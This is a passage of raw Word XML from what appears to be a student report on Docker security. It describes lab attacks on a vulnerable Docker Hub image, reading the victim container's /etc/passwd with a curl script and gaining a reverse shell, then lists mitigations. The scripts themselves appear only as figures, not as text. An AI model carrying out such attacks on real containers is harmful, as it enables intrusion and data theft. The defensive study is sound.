        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="004B762D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00C02904">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> file directory </w:t>
      </w:r>
      <w:r w:rsidR="00B26437">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00301222">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00C02904">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>victim’s</w:t>
      </w:r>
      <w:r w:rsidR="00301222">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> container</w:t>
      </w:r>
      <w:r w:rsidR="004B762D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0071269B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">by executing </w:t>
      </w:r>
      <w:r w:rsidR="00B26437">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00301222">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>curl script</w:t>
      </w:r>
      <w:r w:rsidR="0052761F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC51335" w14:textId="5FF4F812" w:rsidR="00152A7D" w:rsidRDefault="00152A7D" w:rsidP="00152A7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B942842" wp14:editId="1DD92513">
            <wp:extent cx="3858895" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="825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862691" cy="1436512"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DDC113" w14:textId="49E69423" w:rsidR="00152A7D" w:rsidRDefault="00152A7D" w:rsidP="00152A7D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc86858657"/>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Accessing the /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00724717">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00152A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w14:paraId="7AA239CF" w14:textId="3CCC4A7B" w:rsidR="0052761F" w:rsidRDefault="0052761F" w:rsidP="0052761F">
      <w:r>
        <w:t xml:space="preserve">Further, </w:t>
      </w:r>
      <w:r w:rsidR="005A36B7">
        <w:t xml:space="preserve">the attacker </w:t>
      </w:r>
      <w:r w:rsidR="009A4EA6">
        <w:t xml:space="preserve">conducted </w:t>
      </w:r>
      <w:r w:rsidR="007C1186">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009A4EA6">
        <w:t xml:space="preserve">reverse shell attack </w:t>
      </w:r>
      <w:r w:rsidR="004E5492">
        <w:t>by exploiting more vulnerabilities of the application.</w:t>
      </w:r>
      <w:r w:rsidR="007C1186">
        <w:t xml:space="preserve"> To achieve this</w:t>
      </w:r>
      <w:r w:rsidR="00F30EBB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B67E4D">
        <w:t xml:space="preserve"> the author used two containers</w:t>
      </w:r>
      <w:r w:rsidR="009F6EBA">
        <w:t xml:space="preserve">: one to execute the script </w:t>
      </w:r>
      <w:r w:rsidR="000859E9">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="009F6EBA">
        <w:t xml:space="preserve"> figure 67</w:t>
      </w:r>
      <w:r w:rsidR="006D4D75">
        <w:t xml:space="preserve"> and the second used to monitor </w:t>
      </w:r>
      <w:r w:rsidR="0050214A">
        <w:t>incoming traffics</w:t>
      </w:r>
      <w:r w:rsidR="000859E9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000707BB">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00C16B18">
        <w:t xml:space="preserve">he attacker manages to get </w:t>
      </w:r>
      <w:r w:rsidR="00CE2E1B">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F27814">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E0120">
        <w:t>reverse shell on the listener container</w:t>
      </w:r>
      <w:r w:rsidR="006C5471">
        <w:t>, presented in figure 68.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2E65">
        <w:t xml:space="preserve"> This means that the</w:t>
      </w:r>
      <w:r w:rsidR="00687B5D">
        <w:t xml:space="preserve"> attacker can control the input and output of the victim’s container remotely</w:t>
      </w:r>
      <w:r w:rsidR="00365469">
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="003F742F">
        <w:t xml:space="preserve">he gets </w:t>
      </w:r>
      <w:r w:rsidR="00F27814">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003F742F">
        <w:t>reverse shell back</w:t>
      </w:r>
      <w:r w:rsidR="00687B5D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FE5343">
        <w:t xml:space="preserve"> The commands used in figure 63 </w:t>
      </w:r>
      <w:r w:rsidR="00197D0E">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00966FBB">
        <w:t xml:space="preserve">presented in-detail in </w:t>
      </w:r>
      <w:r w:rsidR="00197D0E">
        <w:t xml:space="preserve">the previous </w:t>
      </w:r>
      <w:r w:rsidR="00966FBB">
        <w:t>chapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02910484" w14:textId="1C8AEEE6" w:rsidR="00B67E4D" w:rsidRDefault="00B67E4D" w:rsidP="00B67E4D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C277B6" wp14:editId="377761B3">
            <wp:extent cx="5581650" cy="243648"/>
            <wp:effectExtent l="0" t="0" r="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581650" cy="243648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331B69A" w14:textId="35507D9E" w:rsidR="000859E9" w:rsidRPr="00C86468" w:rsidRDefault="000859E9" w:rsidP="00C86468">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc86858658"/>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>67</w:t>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000859E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Script to execute reverse shell.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="2EB69496" w14:textId="77505C6B" w:rsidR="00B67E4D" w:rsidRDefault="00B67E4D" w:rsidP="00B67E4D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FC46E9" wp14:editId="0E393BEE">
            <wp:extent cx="5340350" cy="639588"/>
            <wp:effectExtent l="0" t="0" r="0"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340350" cy="639588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F66D21" w14:textId="7817D40C" w:rsidR="006C5471" w:rsidRDefault="006C5471" w:rsidP="006C5471">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc86858659"/>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006C5471">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: The Listener.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w14:paraId="04792A6D" w14:textId="1EA33DA7" w:rsidR="00C86468" w:rsidRDefault="0051350D" w:rsidP="00C86468">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00594F51">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F92454">
        <w:t xml:space="preserve">attacker managed to get </w:t>
      </w:r>
      <w:r w:rsidR="00A65C92">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F92454">
        <w:t xml:space="preserve">reverse shell of the </w:t>
      </w:r>
      <w:r w:rsidR="00A65C92">
        <w:t>victim’s container due to the vulnerabilities found in the application.</w:t>
      </w:r>
      <w:r w:rsidR="00C660C3">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00316673">
        <w:t>shows that attackers can infiltrate through vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="000C729E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00316673">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C1D7C">
        <w:t xml:space="preserve">to exploit other containers </w:t>
      </w:r>
      <w:r w:rsidR="00D620C0">
        <w:t>or the Docker host</w:t>
      </w:r>
      <w:r w:rsidR="0086208F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C878EC">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00C84BFD">
        <w:t>extend their attacks.</w:t>
      </w:r>
      <w:r w:rsidR="0046307A">
        <w:t xml:space="preserve"> In other words, </w:t>
      </w:r>
      <w:r w:rsidR="00A418CA">
        <w:t xml:space="preserve">vulnerable applications </w:t>
      </w:r>
      <w:r w:rsidR="004D05D2">
        <w:t xml:space="preserve">pave the way for attackers to </w:t>
      </w:r>
      <w:r w:rsidR="00406EFD">
        <w:t>penetrate</w:t>
      </w:r>
      <w:r w:rsidR="00985F26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00994676">
        <w:t>enterprise</w:t>
      </w:r>
      <w:r w:rsidR="00657336">
        <w:t xml:space="preserve"> and individual</w:t>
      </w:r>
      <w:r w:rsidR="00994676">
        <w:t xml:space="preserve"> systems to </w:t>
      </w:r>
      <w:r w:rsidR="000D183A">
        <w:t xml:space="preserve">damage and steal useful information. In this attack, the application </w:t>
      </w:r>
      <w:r w:rsidR="00FB2471">
        <w:t xml:space="preserve">is downloaded from the </w:t>
      </w:r>
      <w:r w:rsidR="00406EFD">
        <w:t>public repository</w:t>
      </w:r>
      <w:r w:rsidR="00483656">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00406EFD">
        <w:t>Docker Hub</w:t>
      </w:r>
      <w:r w:rsidR="009F41A6">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00FA4D29">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="0075390E">
        <w:t>accessible to every Docker user</w:t>
      </w:r>
      <w:r w:rsidR="008F0509">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C66EEE">
        <w:t xml:space="preserve"> This attack </w:t>
      </w:r>
      <w:r w:rsidR="00D3597E">
        <w:t>showed that</w:t>
      </w:r>
      <w:r w:rsidR="00BF63FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00595CA8">
        <w:t>threat actors</w:t>
      </w:r>
      <w:r w:rsidR="00BF63FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00595CA8">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00BF63FA">
        <w:t>insert</w:t>
      </w:r>
      <w:r w:rsidR="00595CA8">
        <w:t xml:space="preserve"> malicious scripts</w:t>
      </w:r>
      <w:r w:rsidR="002A610B">
        <w:t xml:space="preserve">, including spyware, </w:t>
      </w:r>
      <w:r w:rsidR="00B53969">
        <w:t xml:space="preserve">malware, and viruses </w:t>
      </w:r>
      <w:r w:rsidR="002469DD">
        <w:t xml:space="preserve">and upload </w:t>
      </w:r>
      <w:r w:rsidR="0040369D">
        <w:t xml:space="preserve">them </w:t>
      </w:r>
      <w:r w:rsidR="002469DD">
        <w:t>to the Docker Hub</w:t>
      </w:r>
      <w:r w:rsidR="007A0124">
        <w:t>, and user</w:t>
      </w:r>
      <w:r w:rsidR="00F21FAA">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007A0124">
        <w:t xml:space="preserve"> can download that file </w:t>
      </w:r>
      <w:r w:rsidR="00830EBB">
        <w:t>into their computer or real production environment.</w:t>
      </w:r>
      <w:r w:rsidR="00F645EF">
        <w:t xml:space="preserve"> This way, </w:t>
      </w:r>
      <w:r w:rsidR="00C6529A">
        <w:t>attackers</w:t>
      </w:r>
      <w:r w:rsidR="007B5DEA">
        <w:t xml:space="preserve"> can steal </w:t>
      </w:r>
      <w:r w:rsidR="00A977F0">
        <w:t xml:space="preserve">information and </w:t>
      </w:r>
      <w:r w:rsidR="00AE5B62">
        <w:t>spread out their attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00D30AE8">
        <w:t xml:space="preserve"> However, this attack</w:t>
      </w:r>
      <w:r w:rsidR="00E60329">
        <w:t xml:space="preserve"> can also be prevented using various </w:t>
      </w:r>
      <w:r w:rsidR="00B74A4F">
        <w:t xml:space="preserve">tools and </w:t>
      </w:r>
      <w:r w:rsidR="009572CB">
        <w:t>methods.</w:t>
      </w:r>
      <w:r w:rsidR="00607447">
        <w:t xml:space="preserve"> The following lists help to reduce</w:t>
      </w:r>
      <w:r w:rsidR="00C77074">
        <w:t xml:space="preserve"> or minimise attacks that could originate </w:t>
      </w:r>
      <w:r w:rsidR="00AE7CE9">
        <w:t>from vulnerable applications</w:t>
      </w:r>
      <w:r w:rsidR="00CF2B83">
        <w:t xml:space="preserve"> running on Docker containers</w:t>
      </w:r>
      <w:r w:rsidR="00AE7CE9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622A81C" w14:textId="53EEE641" w:rsidR="00AE7CE9" w:rsidRDefault="00C733FB" w:rsidP="00AE7CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Always use trusted and verified </w:t>
      </w:r>
      <w:r w:rsidR="00381126">
        <w:t>Docker images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19116876" w14:textId="7B4F3BC3" w:rsidR="009416E4" w:rsidRDefault="00381126" w:rsidP="00AE7CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scan </w:t>
      </w:r>
      <w:r w:rsidR="008C356F">
        <w:t xml:space="preserve">Docker images </w:t>
      </w:r>
      <w:r w:rsidR="00DC458B">
        <w:t>using tools, such as</w:t>
      </w:r>
      <w:r w:rsidR="00410660">
        <w:t xml:space="preserve"> Clair</w:t>
      </w:r>
      <w:r w:rsidR="008403C3">
        <w:t>, No</w:t>
      </w:r>
      <w:r w:rsidR="00783826">
        <w:t xml:space="preserve">tary, </w:t>
      </w:r>
      <w:r w:rsidR="00163801">
        <w:t>Docker bench</w:t>
      </w:r>
      <w:r w:rsidR="0044597A">
        <w:t>, and many others to</w:t>
      </w:r>
      <w:r w:rsidR="003B08EE">
        <w:t xml:space="preserve"> find </w:t>
      </w:r>
      <w:r w:rsidR="009416E4">
        <w:t>malicious files</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2054525565"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00595DD9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00595DD9">
            <w:instrText xml:space="preserve"> CITATION BDo21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00595DD9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [91]</w:t>
          </w:r>
          <w:r w:rsidR="00595DD9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="009416E4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0426BB" w14:textId="7D4E1B20" w:rsidR="00381126" w:rsidRDefault="0044597A" w:rsidP="00AE7CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC190A">
        <w:t xml:space="preserve">Enable Docker content trust (DCT) to check and verify </w:t>
      </w:r>
      <w:r w:rsidR="008F0ABA">
        <w:t>Docker images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38739B0E" w14:textId="1AB5882F" w:rsidR="004E2033" w:rsidRDefault="004E2033" w:rsidP="00AE7CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use API connection with TLS and proxy to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00595DD9">
        <w:t>malicious images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41363CE1" w14:textId="637D4405" w:rsidR="00172214" w:rsidRDefault="00093277" w:rsidP="00172214">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc86859304"/>
      <w:r>
        <w:t>DISCUSSIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w14:paraId="288F44EC" w14:textId="433619E3" w:rsidR="00172214" w:rsidRDefault="00324041" w:rsidP="00172214">
      <w:r>
        <w:t xml:space="preserve">This section </w:t>
      </w:r>
      <w:r w:rsidR="00FA79C0">
        <w:t xml:space="preserve">evaluates </w:t>
      </w:r>
      <w:r w:rsidR="000D2079">
        <w:t xml:space="preserve">and examines </w:t>
      </w:r>
      <w:r w:rsidR="00432F48">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="008E5B4D">
        <w:t xml:space="preserve">overall performance of </w:t>
      </w:r>
      <w:r w:rsidR="00580FF3">
        <w:t xml:space="preserve">each attack conducted on </w:t>
      </w:r>
      <w:r w:rsidR="006444FB">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00580FF3">
        <w:t>Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="00666DAC">
        <w:t xml:space="preserve">. It also discusses whether </w:t>
      </w:r>
      <w:r w:rsidR="00F71AF3">
        <w:t>the aims and objectives of this project</w:t>
      </w:r>
      <w:r w:rsidR="00E15B3E">
        <w:t xml:space="preserve"> are achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F676939" w14:textId="7039D0CD" w:rsidR="005772C1" w:rsidRDefault="00E72384" w:rsidP="00172214">
      <w:r>
        <w:t xml:space="preserve">The primary purpose of the first attack was to </w:t>
      </w:r>
      <w:r w:rsidR="00A73E5F">
        <w:t xml:space="preserve">conduct </w:t>
      </w:r>
      <w:r w:rsidR="006444FB">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="000E6026">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A73E5F">
